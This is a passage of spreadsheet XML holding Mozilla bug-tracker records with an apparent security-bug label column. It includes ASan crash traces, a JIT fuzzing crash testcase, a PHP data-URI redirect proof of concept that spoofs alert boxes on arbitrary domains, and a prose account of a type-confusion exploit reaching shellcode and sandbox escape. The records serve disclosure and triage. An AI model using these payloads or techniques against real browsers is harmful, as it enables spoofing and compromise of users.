=&gt;0x0fe81a6dd200:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe81a6dd210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe81a6dd220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe81a6dd230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe81a6dd240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe81a6dd250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
and here:
==8782==ERROR: AddressSanitizer: stack-buffer-underflow on address 0x7fbb49f18a20 at pc 0x460117 bp 0x7fff6f1cbb70 sp 0x7fff6f1cb330
READ of size 33554436 at 0x7fbb49f18a20 thread T0
    #0 0x460116 (/home/g/Apps/firefox-asan/firefox/xpcshell+0x460116)
    #1 0x7fbb5e95b46d (libxul.so+0x333a46d)
    #2 0x7fbb5d75b57e (libxul.so+0x213a57e)
    #3 0x7fbb5d75b381 (libxul.so+0x213a381)
    #4 0x7fbb5d7cf704 (libxul.so+0x21ae704)
    #5 0x7fbb5e8dd571 (libxul.so+0x32bc571)
    #6 0x7fbb5e8dcf7f (libxul.so+0x32bbf7f)
    #7 0x7fbb5e8e0e9b (libxul.so+0x32bfe9b)
    #8 0x7fbb64b1ead2 (libxul.so+0x94fdad2)
    #9 0x7fbb64b1e04c (libxul.so+0x94fd04c)
    #10 0x7fbb64b100e9 (libxul.so+0x94ef0e9)
    #11 0x7fbb64afde50 (libxul.so+0x94dce50)
    #12 0x7fbb64b20bb2 (libxul.so+0x94ffbb2)
    #13 0x7fbb64b2183d (libxul.so+0x950083d)
    #14 0x7fbb6541f06c (libxul.so+0x9dfe06c)
    #15 0x7fbb6541ee04 (libxul.so+0x9dfde04)
    #16 0x7fbb5e91bb74 (libxul.so+0x32fab74)
    #17 0x7fbb5e91be13 (libxul.so+0x32fae13)
    #18 0x7fbb5e8bc92f (libxul.so+0x329b92f)
    #19 0x7fbb5e8ba049 (libxul.so+0x3299049)
    #20 0x48a94f (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a94f)
    #21 0x7fbb57f7eec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #22 0x48a6cc (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a6cc)
Address 0x7fbb49f18a20 is located in stack of thread T11 (JS Helper) at offset 0 in frame
    #0 0x7fbb64af130f (libxul.so+0x94d030f)
  This frame has 2 object(s):
    [32, 36) 'status' &lt;== Memory access at offset 0 partially underflows this variable
    [48, 52) '' &lt;== Memory access at offset 0 partially underflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
Thread T11 (JS Helper) created by T0 here:
    #0 0x45f555 (/home/g/Apps/firefox-asan/firefox/xpcshell+0x45f555)
    #1 0x7fbb6ad15c14 (libnspr4.so+0x71c14)
    #2 0x7fbb6ad1572a (libnspr4.so+0x7172a)
    #3 0x7fbb64aefa7b (libxul.so+0x94cea7b)
    #4 0x7fbb64b83b88 (libxul.so+0x9562b88)
    #5 0x7fbb653f7170 (libxul.so+0x9dd6170)
    #6 0x7fbb5d68696b (libxul.so+0x206596b)
    #7 0x7fbb5e885761 (libxul.so+0x3264761)
    #8 0x7fbb5e889355 (libxul.so+0x3268355)
    #9 0x7fbb5e8f91ef (libxul.so+0x32d81ef)
    #10 0x7fbb5e8f94da (libxul.so+0x32d84da)
    #11 0x7fbb5e88e958 (libxul.so+0x326d958)
    #12 0x7fbb62a2a0b4 (libxul.so+0x74090b4)
    #13 0x7fbb5d77ac8c (libxul.so+0x2159c8c)
    #14 0x7fbb5d77bbdd (libxul.so+0x215abdd)
    #15 0x7fbb5d77ca81 (libxul.so+0x215ba81)
    #16 0x7fbb5d776226 (libxul.so+0x2155226)
    #17 0x7fbb5d81e0c4 (libxul.so+0x21fd0c4)
    #18 0x7fbb5d8030a4 (libxul.so+0x21e20a4)
    #19 0x7fbb5d7f5ae9 (libxul.so+0x21d4ae9)
    #20 0x7fbb5e8b9514 (libxul.so+0x3298514)
    #21 0x48a94f (/home/g/Apps/firefox-asan/firefox/xpcshell+0x48a94f)
    #22 0x7fbb57f7eec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: stack-buffer-underflow ??:0 ??
Shadow bytes around the buggy address:
  0x0ff7e93db0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff7e93db100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff7e93db110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff7e93db120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff7e93db130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0ff7e93db140: 00 00 00 00[f1]f1 f1 f1 04 f2 04 f3 00 00 00 00
  0x0ff7e93db150: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
  0x0ff7e93db160: 00 f2 f2 f2 01 f2 00 f3 f3 f3 f3 f3 00 00 00 00
  0x0ff7e93db170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff7e93db180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0ff7e93db190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
Expected results:
It shouldn't crash.</t>
        </is>
      </c>
      <c r="X891" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="892">
      <c r="A892" t="n">
        <v>603009</v>
      </c>
      <c r="B892" t="inlineStr">
        <is>
          <t>2010-10-08 15:52:58 -0700</t>
        </is>
      </c>
      <c r="C892" t="inlineStr">
        <is>
          <t>Catch and report all exceptions thrown during test pilot study execution</t>
        </is>
      </c>
      <c r="D892" t="inlineStr">
        <is>
          <t>2016-05-10 13:13:22 -0700</t>
        </is>
      </c>
      <c r="E892" t="n">
        <v>1</v>
      </c>
      <c r="F892" t="n">
        <v>1</v>
      </c>
      <c r="G892" t="n">
        <v>6</v>
      </c>
      <c r="H892" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I892" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J892" t="inlineStr">
        <is>
          <t>Test Pilot</t>
        </is>
      </c>
      <c r="K892" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M892" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N892" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O892" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P892" t="inlineStr">
        <is>
          <t>[approved patches landed on aurora] data, api, extension-core</t>
        </is>
      </c>
      <c r="Q892" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R892" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S892" t="inlineStr">
        <is>
          <t>1.2</t>
        </is>
      </c>
      <c r="T892" t="n">
        <v>1</v>
      </c>
      <c r="U892" t="n">
        <v>0</v>
      </c>
      <c r="V892" t="n">
        <v>12</v>
      </c>
      <c r="W892" t="inlineStr">
        <is>
          <t>We should be catching exceptions raised by test pilot code, in the most general way possible, recording them and then reporting them as part of the data upload (in the metadata, or perhaps a new .errors section of the JSON).
This way we can find out what's going wrong on people's computers when they try to run the studies, and fix it in future revisions of the study.
There are two places to catch exceptions: The first is in remote-experiment-loader, where we have the top-level Cuddlefish context that requires and runs everything else.  Any exceptions in the main threads will bubble up to there.
But exceptions that happen in callbacks from listeners are executed from the gecko thread, so we can't catch them in cuddlefish.  The best thing to do there, I think, is to catch exceptions in the ._listen() method of the base study class.
We will probably need to add a new database table for these stored exceptions in order to not abuse the various experiment schemas too bad.  So the data store will need additional API calls for recording errors, and then all the errors should get automatically reported on upload.</t>
        </is>
      </c>
      <c r="X892" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="893">
      <c r="A893" t="n">
        <v>673126</v>
      </c>
      <c r="B893" t="inlineStr">
        <is>
          <t>2011-07-21 08:27:16 -0700</t>
        </is>
      </c>
      <c r="C893" t="inlineStr">
        <is>
          <t>Frequent calculated hash mismatch on public add-ons</t>
        </is>
      </c>
      <c r="D893" t="inlineStr">
        <is>
          <t>2016-02-04 14:51:37 -0800</t>
        </is>
      </c>
      <c r="E893" t="n">
        <v>1</v>
      </c>
      <c r="F893" t="n">
        <v>1</v>
      </c>
      <c r="G893" t="n">
        <v>6</v>
      </c>
      <c r="H893" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I893" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J893" t="inlineStr">
        <is>
          <t>Public Pages</t>
        </is>
      </c>
      <c r="K893" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L893" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M893" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N893" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O893" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P893" t="inlineStr"/>
      <c r="Q893" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R893" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S893" t="inlineStr">
        <is>
          <t>6.1.9</t>
        </is>
      </c>
      <c r="T893" t="n">
        <v>1</v>
      </c>
      <c r="U893" t="n">
        <v>0</v>
      </c>
      <c r="V893" t="n">
        <v>22</v>
      </c>
      <c r="W893" t="inlineStr">
        <is>
          <t>See this forum topic for a number of examples of this:
https://forums.mozilla.org/addons/viewtopic.php?f=7&amp;t=3401&amp;p=10897
I have fixed a few others submitted to the mailing list.
This is a major problem because users can't install the add-on if the hash doesn't match what we have on the site. So far, using the Recalc Hash link in the (old) admin panel has fixed the problem for all of them.</t>
        </is>
      </c>
      <c r="X893" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="894">
      <c r="A894" t="n">
        <v>1269793</v>
      </c>
      <c r="B894" t="inlineStr">
        <is>
          <t>2016-05-03 10:02:49 -0700</t>
        </is>
      </c>
      <c r="C894" t="inlineStr">
        <is>
          <t>Add a note on bugzilla.org that admins should either update ImageMagick (due to CVE-2016-3714) or disable the BmpConvert extension</t>
        </is>
      </c>
      <c r="D894" t="inlineStr">
        <is>
          <t>2016-05-16 13:55:51 -0700</t>
        </is>
      </c>
      <c r="E894" t="n">
        <v>1</v>
      </c>
      <c r="F894" t="n">
        <v>1</v>
      </c>
      <c r="G894" t="n">
        <v>4</v>
      </c>
      <c r="H894" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I894" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J894" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K894" t="inlineStr">
        <is>
          <t>4.4</t>
        </is>
      </c>
      <c r="L894" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M894" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N894" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O894" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P894" t="inlineStr"/>
      <c r="Q894" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R894" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S894" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T894" t="n">
        <v>1</v>
      </c>
      <c r="U894" t="n">
        <v>0</v>
      </c>
      <c r="V894" t="n">
        <v>10</v>
      </c>
      <c r="W894" t="inlineStr">
        <is>
          <t>https://medium.com/@rhuber/imagemagick-is-on-fire-cve-2016-3714-379faf762247#.kqh5svaq0
&gt; If you use ImageMagick or an affected library, we recommend you mitigate the
&gt; known vulnerabilities by doing at least one these two things (but preferably
&gt; both!):
&gt; Verify that all image files begin with the expected “magic bytes”
&gt; corresponding to the image file types you support before sending them to
&gt; ImageMagick for processing. (see FAQ for more info) Use a policy file to
&gt; disable the vulnerable ImageMagick coders. The global policy for ImageMagick
&gt; is usually found in “/etc/ImageMagick”. This policy.xml example will disable
&gt; the coders EPHEMERAL, URL, MVG, and MSL.
&gt; https://gist.githubusercontent.com/rawdigits/d73312d21c8584590783a5e07e124723/raw/d3232a3958d8a26adcce53dfa2413b42623ca4b8/policy.xml</t>
        </is>
      </c>
      <c r="X894" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="895">
      <c r="A895" t="n">
        <v>1743931</v>
      </c>
      <c r="B895" t="inlineStr">
        <is>
          <t>2021-12-01 16:44:41 -0800</t>
        </is>
      </c>
      <c r="C895" t="inlineStr">
        <is>
          <t>We can spoof js alert box on an arbitrary domain for Firefox for Android Nightly</t>
        </is>
      </c>
      <c r="D895" t="inlineStr">
        <is>
          <t>2024-05-30 10:51:48 -0700</t>
        </is>
      </c>
      <c r="E895" t="n">
        <v>1</v>
      </c>
      <c r="F895" t="n">
        <v>1</v>
      </c>
      <c r="G895" t="n">
        <v>2</v>
      </c>
      <c r="H895" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I895" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J895" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K895" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L895" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M895" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N895" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O895" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P895" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main97+]</t>
        </is>
      </c>
      <c r="Q895" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R895" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S895" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T895" t="n">
        <v>1</v>
      </c>
      <c r="U895" t="n">
        <v>0</v>
      </c>
      <c r="V895" t="n">
        <v>26</v>
      </c>
      <c r="W895" t="inlineStr">
        <is>
          <t>Test on: https://pwning.click/data302r.php
After you allow to reload the page, you are able to run alert box on arbitrary domain for Firefox Nightly. This works through data: URI 302 redirection.
&lt;?php header("Location: data:text/html;base64,PHNjcmlwdD5mdW5jdGlvbiB5KCl7eD1vcGVuKCdodHRwczovL3d3dy5nb29nbGUuY29tJywnX3RvcCcpLHguZG9jdW1lbnQudGl0bGU9JycseC5kb2N1bWVudC5ib2R5LmlubmVySFRNTD0nPGltZy9zcmM9IiJvbmVycm9yPSJhbGVydCgmcXVvdDt0aGlzIGlzIGZyb20gZ29vZ2xlJnF1b3Q7KSI+PGltZy9zcmM9IiJvbmVycm9yPSJhbGVydCgmcXVvdDt0aGlzIGlzIGZyb20gZ29vZ2xlJnF1b3Q7KSI+PGltZy9zcmM9IiJvbmVycm9yPSJhbGVydCgmcXVvdDt0aGlzIGlzIGZyb20gZ29vZ2xlJnF1b3Q7KSI+J307c2V0VGltZW91dCh5LCAxMCk7Cjwvc2NyaXB0Pg==
", true, 302); ?&gt;</t>
        </is>
      </c>
      <c r="X895" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="896">
      <c r="A896" t="n">
        <v>995704</v>
      </c>
      <c r="B896" t="inlineStr">
        <is>
          <t>2014-04-12 22:54:54 -0700</t>
        </is>
      </c>
      <c r="C896" t="inlineStr">
        <is>
          <t>Crash [@ EnterIon] or [@ js::jit::IonCannon] or [@ js::RunScript]</t>
        </is>
      </c>
      <c r="D896" t="inlineStr">
        <is>
          <t>2016-06-04 15:33:30 -0700</t>
        </is>
      </c>
      <c r="E896" t="n">
        <v>1</v>
      </c>
      <c r="F896" t="n">
        <v>1</v>
      </c>
      <c r="G896" t="n">
        <v>3</v>
      </c>
      <c r="H896" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I896" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J896" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K896" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L896" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M896" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N896" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O896" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P896" t="inlineStr">
        <is>
          <t>[adv-main32+]</t>
        </is>
      </c>
      <c r="Q896" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R896" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S896" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T896" t="n">
        <v>1</v>
      </c>
      <c r="U896" t="n">
        <v>0</v>
      </c>
      <c r="V896" t="n">
        <v>40</v>
      </c>
      <c r="W896" t="inlineStr">
        <is>
          <t>Created attachment 8405828
stack for partially reduced testcase
function g(f, inputs) {
    for (j = 0; j &lt; 49; ++j) {
        f(inputs[j], inputs[0])
    }
}
__proto__ = Iterator(true)
m0 = (function(x, y) {
    return (Math.min((((Number.E | 0) * (y | 0) &amp;&amp; x()) &amp; Math.round((y | 0) ? Math.trunc((y) = 0) : Math.pow(Math.round))), (Math.tan(((Math.imul()) + ((Math.imul(Math.round(Math.round(x &gt; 0)), Math.cbrt(Number.I))) &lt; (y | 0)))))))
})
m3 = (function(x, y) {
    return m1((((Number.E, m0()) * Math.tan) | Math.round(m1(Math.exp, m0(Math.tan(y))))), m2(x))
})
m1 = (function(x, y) {
    return Math.round(Math.round(Math.min((Math.imul() &gt; (m0(y | 0, Math.round(m0())))), m0())))
})
m4 = (function(x, y) {
    return Math.min((y &gt; 0, (m2(Math.pow(Math.sin)))), (m1(m3(), Math.round(m3(m3(x))))))
});
m2 = (function(x, y) {
    return (Math.round(m1(false, Math.round())) ^ (m0((m1(m0())), m0(Math.log &lt; y)) ^ Math.min(Math.exp(Math.round(undefined &gt; 0)))))
})
try {
    (function() {
        m5 = (function(x, y) {
            m4(Math.round)
        })
        g(m5, [, 0])
    })()
} catch (e) {}
crashes js debug and opt shell on m-c changeset ebdf2740dc3e with --ion-eager --ion-parallel-compile=off --ion-range-analysis=off --ion-regalloc=backtracking at EnterIon with js::jit::IonCannon and js::RunScript on the stack.
My configure flags are:
MAKE=mozmake AR=ar sh c:\\\\Users\\\\mozillaadmin\\\\trees\\\\mozilla-central\\\\js\\\\src\\\\configure --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --disable-tests --enable-more-deterministic --enable-threadsafe &lt;other NSPR options&gt;
Run this testcase multiple times (up to 50/100 times) to get it to reproduce. An upcoming unreduced testcase is a little more reliable (crashes up to once every 5 times).
Setting s-s and sec-critical because a barely reproducible JIT crash on Windows sounds really bad, pending further analysis.
Will try bisecting this.</t>
        </is>
      </c>
      <c r="X896" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="897">
      <c r="A897" t="n">
        <v>376473</v>
      </c>
      <c r="B897" t="inlineStr">
        <is>
          <t>2007-04-04 05:09:17 -0700</t>
        </is>
      </c>
      <c r="C897" t="inlineStr">
        <is>
          <t>[mz2] file action dialog controls vulnerable to refocus race</t>
        </is>
      </c>
      <c r="D897" t="inlineStr">
        <is>
          <t>2008-03-18 11:27:18 -0700</t>
        </is>
      </c>
      <c r="E897" t="n">
        <v>1</v>
      </c>
      <c r="F897" t="n">
        <v>1</v>
      </c>
      <c r="G897" t="n">
        <v>2</v>
      </c>
      <c r="H897" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I897" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J897" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K897" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L897" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M897" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N897" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O897" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P897" t="inlineStr">
        <is>
          <t>[sg:moderate] (exfiltration of local data when combined with bug 230606, otherwise requires vulnerable external app)</t>
        </is>
      </c>
      <c r="Q897" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R897" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S897" t="inlineStr">
        <is>
          <t>Firefox 3 beta2</t>
        </is>
      </c>
      <c r="T897" t="n">
        <v>1</v>
      </c>
      <c r="U897" t="n">
        <v>0</v>
      </c>
      <c r="V897" t="n">
        <v>32</v>
      </c>
      <c r="W897" t="inlineStr">
        <is>
          <t>Affected mechanism: as a measure to prevent malicious trickery or human errors, some controls in several security-related dialogs are disabled (grayed out) when the window first displayed or when focus is removed from the dialog; and re-enabled by a delay timer after about 1 second after focus is gained.
Attack vector: on certain file-related prompts, re-enable timer is not stopped if focus is again removed before the initial timer had a chance to expire. When this happens, controls in a blurred window are re-enabled while the dialog is hidden, only to be instantly clickable when the window emerges from underneath a programatically closed decoy. This is confirmed on Windows, and may work differently on other platforms, depending on WM focus / raise policies.
Impact: any web page that can elicit user to click a particular region in an open window, or to hit RETURN at a roughly predictable moment, can use this to run potentially dangerous files without user consent.
Test case: see URL.
To fix: be sure to remove any pending refocus timers on blur on all dialogs that implement such a mechanism.</t>
        </is>
      </c>
      <c r="X897" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="898">
      <c r="A898" t="n">
        <v>1538006</v>
      </c>
      <c r="B898" t="inlineStr">
        <is>
          <t>2019-03-21 14:26:49 -0700</t>
        </is>
      </c>
      <c r="C898" t="inlineStr">
        <is>
          <t>ZDI-CAN-8373: Initial code execution: Type confusion in IonMonkey optimizer</t>
        </is>
      </c>
      <c r="D898" t="inlineStr">
        <is>
          <t>2023-12-06 07:55:51 -0800</t>
        </is>
      </c>
      <c r="E898" t="n">
        <v>1</v>
      </c>
      <c r="F898" t="n">
        <v>1</v>
      </c>
      <c r="G898" t="n">
        <v>3</v>
      </c>
      <c r="H898" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I898" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J898" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K898" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L898" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M898" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N898" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O898" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P898" t="inlineStr">
        <is>
          <t>[Keep hidden while 1538007 is][jsbugmon:update,testComment=5,origRev=b2f1edb41241]</t>
        </is>
      </c>
      <c r="Q898" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R898" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S898" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T898" t="n">
        <v>1</v>
      </c>
      <c r="U898" t="n">
        <v>0</v>
      </c>
      <c r="V898" t="n">
        <v>26</v>
      </c>
      <c r="W898" t="inlineStr">
        <is>
          <t>Created attachment 9052726
ZDI-CAN-8373-8374.zip
# Initial code execution: Type confusion in IonMonkey optimizer
The vulnerability used by this exploit is an old bug in the type inference engine
of the IonMonkey JIT compiler used by Spidermonkey. It was introduced in 2017:
    commit 1c43dd975e76c0aa7e5a84af36844d247baf671a (HEAD, refs/bisect/bad)
    Author: Jan de Mooij &lt;jdemooij@mozilla.com&gt;
    Date:   Thu Sep 7 12:51:45 2017 +0200
        Bug 1395919 - Don't copy the unknown-properties flag in AddPropertyTypesAfterProtoChange. r=bhackett
Running the poc.js file against a debug build of Spidermonkey will trigger the following assertion
Assertion failure: MIR instruction returned object with unexpected type, at /root/firefox/gecko-dev/js/src/jit/MacroAssembler.cpp:2030
Trace/breakpoint trap (core dumped)
The primitive that results from triggering this issue is essentially the lack
of a shape/group check on an object, which means that we can produce a compiled
JS function that treats an object as if it had a different type.
Specifically, this can be used to confuse a typed array object with a regular
JSObject, causing various possible type confusions between doubles and pointers.
The provided exploit triggers the bug twice, once to leak an object address, and
then a second time to fake a typed array with a fully controlled pointer, achieving
an arbitrary read/write primitive. With this we can map a RWX region to execute our shellcode and escape the sandbox</t>
        </is>
      </c>
      <c r="X898" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="899">
      <c r="A899" t="n">
        <v>488984</v>
      </c>
      <c r="B899" t="inlineStr">
        <is>
          <t>2009-04-18 06:49:30 -0700</t>
        </is>
      </c>
      <c r="C899" t="inlineStr">
        <is>
          <t>when draging tab to content area aEvent.screenX/Y in _onDragEnd is always 0 (breaks tab tearing)</t>
        </is>
      </c>
      <c r="D899" t="inlineStr">
        <is>
          <t>2010-05-10 13:42:07 -0700</t>
        </is>
      </c>
      <c r="E899" t="n">
        <v>1</v>
      </c>
      <c r="F899" t="n">
        <v>1</v>
      </c>
      <c r="G899" t="n">
        <v>2</v>
      </c>
      <c r="H899" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I899" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J899" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K899" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L899" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M899" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N899" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O899" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P899" t="inlineStr"/>
      <c r="Q899" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R899" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S899" t="inlineStr">
        <is>
          <t>Firefox 3.6a1</t>
        </is>
      </c>
      <c r="T899" t="n">
        <v>1</v>
      </c>
      <c r="U899" t="n">
        <v>2</v>
      </c>
      <c r="V899" t="n">
        <v>14</v>
      </c>
      <c r="W899" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090417 Firefox/3.5.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090417 Firefox/3.5.0
After fixed Bug 466379 -  Need mouse-pointer coordinates in the dragend event ,
when draging tab to content area aEvent.screenX/Y in _onDragEnd is always 0
See https://bugzilla.mozilla.org/show_bug.cgi?id=475066#c69
Reproducible: Always
Actual Results:  
0 is always returned. 
Expected Results:  
The right coordinates are returned.</t>
        </is>
      </c>
      <c r="X899" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="900">
      <c r="A900" t="n">
        <v>1174912</v>
      </c>
      <c r="B900" t="inlineStr">
        <is>
          <t>2015-06-15 14:56:18 -0700</t>
        </is>
      </c>
      <c r="C900" t="inlineStr">
        <is>
          <t>Executive dashboard with v2 + v4 data (design)</t>
        </is>
      </c>
      <c r="D900" t="inlineStr">
        <is>
          <t>2018-10-15 11:08:31 -0700</t>
        </is>
      </c>
      <c r="E900" t="n">
        <v>1</v>
      </c>
      <c r="F900" t="n">
        <v>1</v>
      </c>
      <c r="G900" t="n">
        <v>6</v>
      </c>
      <c r="H900" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I900" t="inlineStr">
        <is>
          <t>Cloud Services Graveyard</t>
        </is>
      </c>
      <c r="J900" t="inlineStr">
        <is>
          <t>Metrics: Pipeline</t>
        </is>
      </c>
      <c r="K900" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L900" t="inlineStr">
        <is>
